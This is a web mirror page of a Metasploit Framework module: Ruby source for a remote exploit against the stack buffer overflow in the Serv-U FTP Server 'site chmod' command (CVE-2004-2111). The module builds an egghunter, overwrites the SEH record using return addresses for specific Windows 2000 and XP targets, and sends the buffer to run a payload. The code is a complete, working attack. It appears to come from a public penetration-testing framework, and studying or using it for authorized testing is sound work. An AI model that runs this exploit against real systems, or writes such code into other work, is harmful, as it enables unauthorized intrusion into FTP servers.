Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/servu_chmod.rb
19534 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Egghunter
10
include Msf::Exploit::Remote::Ftp
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Serv-U FTP Server Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in the site chmod command
19
in versions of Serv-U FTP Server prior to 4.2.
20
21
You must have valid credentials to trigger this vulnerability. Exploitation
22
also leaves the service in a non-functional state.
23
},
24
'Author' => 'theLightCosine',
25
'License' => MSF_LICENSE,
26
'References' => [
27
[ 'CVE', '2004-2111'],
28
[ 'OSVDB', '3713'],
29
[ 'BID', '9483'],
30
],
31
'Privileged' => true,
32
'DefaultOptions' => {
33
'EXITFUNC' => 'thread',
34
},
35
'Payload' => {
36
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
37
'DisableNops' => true,
38
},
39
'Platform' => 'win',
40
'Targets' => [
41
[
42
'Windows 2000 SP0-4 EN', {
43
'Ret' => 0x750212bc, # WS2HELP.DLL
44
'Offset' => 396
45
}
46
],
47
[
48
'Windows XP SP0-1 EN', {
49
'Ret' => 0x71aa388f, # WS2HELP.DLL
50
'Offset' => 394
51
}
52
]
53
],
54
'DisclosureDate' => '2004-12-31',
55
'DefaultTarget' => 0,
56
'Notes' => {
57
'Reliability' => UNKNOWN_RELIABILITY,
58
'Stability' => UNKNOWN_STABILITY,
59
'SideEffects' => UNKNOWN_SIDE_EFFECTS
60
}
61
)
62
)
63
end
64
65
def check
66
connect
67
disconnect
68
69
if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
70
return Exploit::CheckCode::Appears
71
end
72
73
return Exploit::CheckCode::Safe
74
end
75
76
def exploit
77
c = connect_login
78
return if not c
79
80
eggoptions =
81
{
82
:checksum => true,
83
:eggtag => "W00T"
84
}
85
86
hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
87
88
buffer = "chmod 777 "
89
buffer << make_nops(target['Offset'] - egg.length - hunter.length)
90
buffer << egg
91
buffer << hunter
92
buffer << "\xeb\xc9\x41\x41" # nseh, jump back to egghunter
93
buffer << [target.ret].pack('V') # seh
94
buffer << rand_text(5000)
95
96
print_status("Trying target #{target.name}...")
97
98
send_cmd(['SITE', buffer], false)
99
100
handler
101
disconnect
102
end
103
end
104
105